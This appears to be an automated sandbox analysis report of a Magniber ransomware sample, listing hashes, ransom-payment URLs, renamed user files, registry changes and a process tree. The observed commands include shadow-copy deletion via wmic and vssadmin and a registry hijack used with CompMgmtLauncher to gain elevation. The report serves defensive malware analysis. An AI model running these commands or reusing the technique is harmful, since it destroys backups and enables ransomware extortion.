Analysis
-
max time kernel
99s -
max time network
160s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
22-06-2021 14:06
Static task
static1
Behavioral task
behavioral1
Sample
2.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
2.exe
Resource
win10v20210408
General
-
Target
2.exe
-
Size
21KB
-
MD5
2953b6ec692537f8eace1077081f9e43
-
SHA1
6db28862c0dbb589b918f812ff61cfdac0248eab
-
SHA256
2cf60c433df3dcc84b80e18c93e578bf18b31c5c49777953702c53166275796b
-
SHA512
11959d3841c3824e5d4c68771f67db6227423d99f5beb6559c165081b6300fb3553633ce871157bd972845730fcc9e1201c10507f114d7458b3940c8cdf0ca85
Malware Config
Extracted
C:\Users\Admin\Desktop\readme.txt
magniber
http://7478f2f8eed008e0ekmxfykjdz.5s4ixqul2enwxrqv.onion/kmxfykjdz
http://7478f2f8eed008e0ekmxfykjdz.bestep.cyou/kmxfykjdz
http://7478f2f8eed008e0ekmxfykjdz.plughas.casa/kmxfykjdz
http://7478f2f8eed008e0ekmxfykjdz.ownhits.space/kmxfykjdz
http://7478f2f8eed008e0ekmxfykjdz.dayhit.xyz/kmxfykjdz
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 10 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 304 1680 cmd.exe 47 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2056 1680 cmd.exe 47 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2076 1680 cmd.exe 47 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2068 1680 cmd.exe 47 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 792 1680 cmd.exe 47 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2708 1680 vssadmin.exe 47 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2700 1680 vssadmin.exe 47 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2732 1680 vssadmin.exe 47 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2772 1680 vssadmin.exe 47 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2764 1680 vssadmin.exe 47 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\SplitJoin.tif => C:\Users\Admin\Pictures\SplitJoin.tif.kmxfykjdz taskhost.exe File renamed C:\Users\Admin\Pictures\ReceiveCompare.crw => C:\Users\Admin\Pictures\ReceiveCompare.crw.kmxfykjdz taskhost.exe File renamed C:\Users\Admin\Pictures\UnblockSuspend.raw => C:\Users\Admin\Pictures\UnblockSuspend.raw.kmxfykjdz taskhost.exe File renamed C:\Users\Admin\Pictures\UnpublishSync.raw => C:\Users\Admin\Pictures\UnpublishSync.raw.kmxfykjdz taskhost.exe File opened for modification C:\Users\Admin\Pictures\RenameHide.tiff taskhost.exe File renamed C:\Users\Admin\Pictures\RenameHide.tiff => C:\Users\Admin\Pictures\RenameHide.tiff.kmxfykjdz taskhost.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 916 set thread context of 1124 916 2.exe 14 PID 916 set thread context of 1180 916 2.exe 13 PID 916 set thread context of 1208 916 2.exe 12 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2764 vssadmin.exe 2708 vssadmin.exe 2700 vssadmin.exe 2732 vssadmin.exe 2772 vssadmin.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000051618adbbbd0f84eb34ff59fe7045e8f00000000020000000000106600000001000020000000f3c76d712ee1141fb114935f05c590a66dcddc986e42e616aba0c2ae7fbc1826000000000e8000000002000020000000230dabf117bc90c9dfd97cf0e9e600ec2ccdf5368713abaf2f4d6336e2befb8e20000000d66afc7ecc50b3dbfcadacec19c843866694d3ddb2fc04a1de184bce5b6e324040000000f7f7d37bae705a3f188283f0da73e5cf26753fb3189bf9e6505eb2da9ac2167eccf35931d16d2a582c7668075243eb99936d4cb7d6e4fd16edfad8cba1826aec iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000051618adbbbd0f84eb34ff59fe7045e8f0000000002000000000010660000000100002000000051a9932cd817ce9c3297f5c1817705df8ea70c85a9bfddacec421a3d621743a1000000000e80000000020000200000005bdc0a3e18a790d13a6c8f8886e8629f6da84329f8e541f998106b0fe4fd1da390000000f3ee2f70213f72b88b7ad2cc8126313ac76ad8f81ad516f8e66f6381df3c7d3dec16641137dfb55a5353d4061fc4735cb3ac63ae90b60690bd7ef034bc21dddf195eb60523b432b3d985d19a3f0328311acea403f7d61e49e1727401ff9274ee436a0b08fdbed4b7913be9b4169f59c00e2dc4c6add14901e7d20bd94d18c0c43ec8ee0d6cfe17fba3a3600522464ede40000000a97ed35f1293e027cf0c6197b266203eb90d29e7c0018a700f3315ce1055da42c31170f1719015e1936325911758f8240d1ebf953b4ed881f2dd117834db37f9 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "331135561" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{90321D31-D362-11EB-B85A-F2B989C9245F} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 00ccb6686f67d701 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe -
Modifies registry class 11 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" 2.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command Dwm.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command 2.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell taskhost.exe Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" taskhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" Dwm.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2024 notepad.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 916 2.exe 916 2.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 916 2.exe 916 2.exe 916 2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1208 Explorer.EXE Token: SeShutdownPrivilege 1208 Explorer.EXE Token: SeShutdownPrivilege 1208 Explorer.EXE Token: SeIncreaseQuotaPrivilege 1840 WMIC.exe Token: SeSecurityPrivilege 1840 WMIC.exe Token: SeTakeOwnershipPrivilege 1840 WMIC.exe Token: SeLoadDriverPrivilege 1840 WMIC.exe Token: SeSystemProfilePrivilege 1840 WMIC.exe Token: SeSystemtimePrivilege 1840 WMIC.exe Token: SeProfSingleProcessPrivilege 1840 WMIC.exe Token: SeIncBasePriorityPrivilege 1840 WMIC.exe Token: SeCreatePagefilePrivilege 1840 WMIC.exe Token: SeBackupPrivilege 1840 WMIC.exe Token: SeRestorePrivilege 1840 WMIC.exe Token: SeShutdownPrivilege 1840 WMIC.exe Token: SeDebugPrivilege 1840 WMIC.exe Token: SeSystemEnvironmentPrivilege 1840 WMIC.exe Token: SeRemoteShutdownPrivilege 1840 WMIC.exe Token: SeUndockPrivilege 1840 WMIC.exe Token: SeManageVolumePrivilege 1840 WMIC.exe Token: 33 1840 WMIC.exe Token: 34 1840 WMIC.exe Token: 35 1840 WMIC.exe Token: SeIncreaseQuotaPrivilege 1616 WMIC.exe Token: SeSecurityPrivilege 1616 WMIC.exe Token: SeTakeOwnershipPrivilege 1616 WMIC.exe Token: SeLoadDriverPrivilege 1616 WMIC.exe Token: SeSystemProfilePrivilege 1616 WMIC.exe Token: SeSystemtimePrivilege 1616 WMIC.exe Token: SeProfSingleProcessPrivilege 1616 WMIC.exe Token: SeIncBasePriorityPrivilege 1616 WMIC.exe Token: SeCreatePagefilePrivilege 1616 WMIC.exe Token: SeBackupPrivilege 1616 WMIC.exe Token: SeRestorePrivilege 1616 WMIC.exe Token: SeShutdownPrivilege 1616 WMIC.exe Token: SeDebugPrivilege 1616 WMIC.exe Token: SeSystemEnvironmentPrivilege 1616 WMIC.exe Token: SeRemoteShutdownPrivilege 1616 WMIC.exe Token: SeUndockPrivilege 1616 WMIC.exe Token: SeManageVolumePrivilege 1616 WMIC.exe Token: 33 1616 WMIC.exe Token: 34 1616 WMIC.exe Token: 35 1616 WMIC.exe Token: SeIncreaseQuotaPrivilege 1728 WMIC.exe Token: SeSecurityPrivilege 1728 WMIC.exe Token: SeTakeOwnershipPrivilege 1728 WMIC.exe Token: SeLoadDriverPrivilege 1728 WMIC.exe Token: SeSystemProfilePrivilege 1728 WMIC.exe Token: SeSystemtimePrivilege 1728 WMIC.exe Token: SeProfSingleProcessPrivilege 1728 WMIC.exe Token: SeIncBasePriorityPrivilege 1728 WMIC.exe Token: SeCreatePagefilePrivilege 1728 WMIC.exe Token: SeBackupPrivilege 1728 WMIC.exe Token: SeRestorePrivilege 1728 WMIC.exe Token: SeShutdownPrivilege 1728 WMIC.exe Token: SeDebugPrivilege 1728 WMIC.exe Token: SeSystemEnvironmentPrivilege 1728 WMIC.exe Token: SeRemoteShutdownPrivilege 1728 WMIC.exe Token: SeUndockPrivilege 1728 WMIC.exe Token: SeManageVolumePrivilege 1728 WMIC.exe Token: 33 1728 WMIC.exe Token: 34 1728 WMIC.exe Token: 35 1728 WMIC.exe Token: SeShutdownPrivilege 1208 Explorer.EXE -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1208 Explorer.EXE 1596 iexplore.exe 1208 Explorer.EXE 1208 Explorer.EXE 1208 Explorer.EXE 1208 Explorer.EXE -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 1208 Explorer.EXE 1208 Explorer.EXE 1208 Explorer.EXE 1208 Explorer.EXE 1208 Explorer.EXE 1208 Explorer.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1596 iexplore.exe 1596 iexplore.exe 1072 IEXPLORE.EXE 1072 IEXPLORE.EXE 1072 IEXPLORE.EXE 1072 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1124 wrote to memory of 2024 1124 taskhost.exe 26 PID 1124 wrote to memory of 2024 1124 taskhost.exe 26 PID 1124 wrote to memory of 2024 1124 taskhost.exe 26 PID 1124 wrote to memory of 568 1124 taskhost.exe 27 PID 1124 wrote to memory of 568 1124 taskhost.exe 27 PID 1124 wrote to memory of 568 1124 taskhost.exe 27 PID 1124 wrote to memory of 1512 1124 taskhost.exe 28 PID 1124 wrote to memory of 1512 1124 taskhost.exe 28 PID 1124 wrote to memory of 1512 1124 taskhost.exe 28 PID 1512 wrote to memory of 1840 1512 cmd.exe 31 PID 1512 wrote to memory of 1840 1512 cmd.exe 31 PID 1512 wrote to memory of 1840 1512 cmd.exe 31 PID 568 wrote to memory of 1596 568 cmd.exe 32 PID 568 wrote to memory of 1596 568 cmd.exe 32 PID 568 wrote to memory of 1596 568 cmd.exe 32 PID 1180 wrote to memory of 608 1180 Dwm.exe 33 PID 1180 wrote to memory of 608 1180 Dwm.exe 33 PID 1180 wrote to memory of 608 1180 Dwm.exe 33 PID 608 wrote to memory of 1616 608 cmd.exe 38 PID 608 wrote to memory of 1616 608 cmd.exe 38 PID 608 wrote to memory of 1616 608 cmd.exe 38 PID 1208 wrote to memory of 1968 1208 Explorer.EXE 36 PID 1208 wrote to memory of 1968 1208 Explorer.EXE 36 PID 1208 wrote to memory of 1968 1208 Explorer.EXE 36 PID 1968 wrote to memory of 1728 1968 cmd.exe 40 PID 1968 wrote to memory of 1728 1968 cmd.exe 40 PID 1968 wrote to memory of 1728 1968 cmd.exe 40 PID 916 wrote to memory of 2016 916 2.exe 41 PID 916 wrote to memory of 2016 916 2.exe 41 PID 916 wrote to memory of 2016 916 2.exe 41 PID 916 wrote to memory of 1288 916 2.exe 43 PID 916 wrote to memory of 1288 916 2.exe 43 PID 916 wrote to memory of 1288 916 2.exe 43 PID 1288 wrote to memory of 472 1288 cmd.exe 45 PID 1288 wrote to memory of 472 1288 cmd.exe 45 PID 1288 wrote to memory of 472 1288 cmd.exe 45 PID 2016 wrote to memory of 1388 2016 cmd.exe 46 PID 2016 wrote to memory of 1388 2016 cmd.exe 46 PID 2016 wrote to memory of 1388 2016 cmd.exe 46 PID 1596 wrote to memory of 1072 1596 iexplore.exe 49 PID 1596 wrote to memory of 1072 1596 iexplore.exe 49 PID 1596 wrote to memory of 1072 1596 iexplore.exe 49 PID 1596 wrote to memory of 1072 1596 iexplore.exe 49 PID 304 wrote to memory of 2180 304 cmd.exe 60 PID 304 wrote to memory of 2180 304 cmd.exe 60 PID 304 wrote to memory of 2180 304 cmd.exe 60 PID 792 wrote to memory of 2196 792 cmd.exe 61 PID 792 wrote to memory of 2196 792 cmd.exe 61 PID 792 wrote to memory of 2196 792 cmd.exe 61 PID 2076 wrote to memory of 2212 2076 cmd.exe 62 PID 2076 wrote to memory of 2212 2076 cmd.exe 62 PID 2076 wrote to memory of 2212 2076 cmd.exe 62 PID 2056 wrote to memory of 2252 2056 cmd.exe 63 PID 2056 wrote to memory of 2252 2056 cmd.exe 63 PID 2056 wrote to memory of 2252 2056 cmd.exe 63 PID 2068 wrote to memory of 2280 2068 cmd.exe 64 PID 2068 wrote to memory of 2280 2068 cmd.exe 64 PID 2068 wrote to memory of 2280 2068 cmd.exe 64 PID 2180 wrote to memory of 2388 2180 CompMgmtLauncher.exe 65 PID 2180 wrote to memory of 2388 2180 CompMgmtLauncher.exe 65 PID 2180 wrote to memory of 2388 2180 CompMgmtLauncher.exe 65 PID 2212 wrote to memory of 2436 2212 CompMgmtLauncher.exe 68 PID 2212 wrote to memory of 2436 2212 CompMgmtLauncher.exe 68 PID 2212 wrote to memory of 2436 2212 CompMgmtLauncher.exe 68
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"2⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵PID:1388
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵PID:472
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:608 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2024
-
-
C:\Windows\system32\cmd.execmd /c "start http://7478f2f8eed008e0ekmxfykjdz.bestep.cyou/kmxfykjdz^&1^&47212692^&73^&325^&12"2⤵
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://7478f2f8eed008e0ekmxfykjdz.bestep.cyou/kmxfykjdz&1&47212692&73&325&123⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1596 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1072
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:304 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2388
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:2252
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2456
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2436
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:2280
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2544
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵PID:2196
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵PID:2484
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2708
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2700
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2732
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2772
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2764
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2888